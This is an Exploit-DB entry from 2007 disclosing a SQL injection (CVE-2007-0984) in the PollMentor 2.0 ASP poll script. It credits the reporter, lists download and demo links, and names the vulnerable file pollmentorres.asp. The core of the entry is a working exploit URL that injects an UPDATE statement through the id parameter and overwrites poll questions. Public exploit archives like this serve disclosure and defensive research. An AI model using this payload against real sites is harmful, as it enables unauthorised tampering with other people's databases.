PollMentor 2.0 pollmentorres.asp id SQL Injection Vulnerability

2007-02-13T00:00:00
ID EDB-ID:3301
Type exploitdb
Reporter SaO
Modified 2007-02-13T00:00:00

Description

PollMentor 2.0 (pollmentorres.asp id) SQL Injection Vulnerability. CVE-2007-0984. Webapps exploit for asp platform

                                        
                                            XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX
X                                       X
X Author  : SaO                         X
X Site    : wWw.SaoHackStyLe.cOm        X
X Contact : By.SaO[at]Hotmail[dot]com   X
X                                       X
X                                       X
XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX

# Script   : PollMentor v2.0
# Download : http://www.aspindir.com/indir.asp?id=4406
# Demo     : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp
# ßug in   : pollmentorres.asp
# Exp.     : 
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

# milw0rm.com [2007-02-13]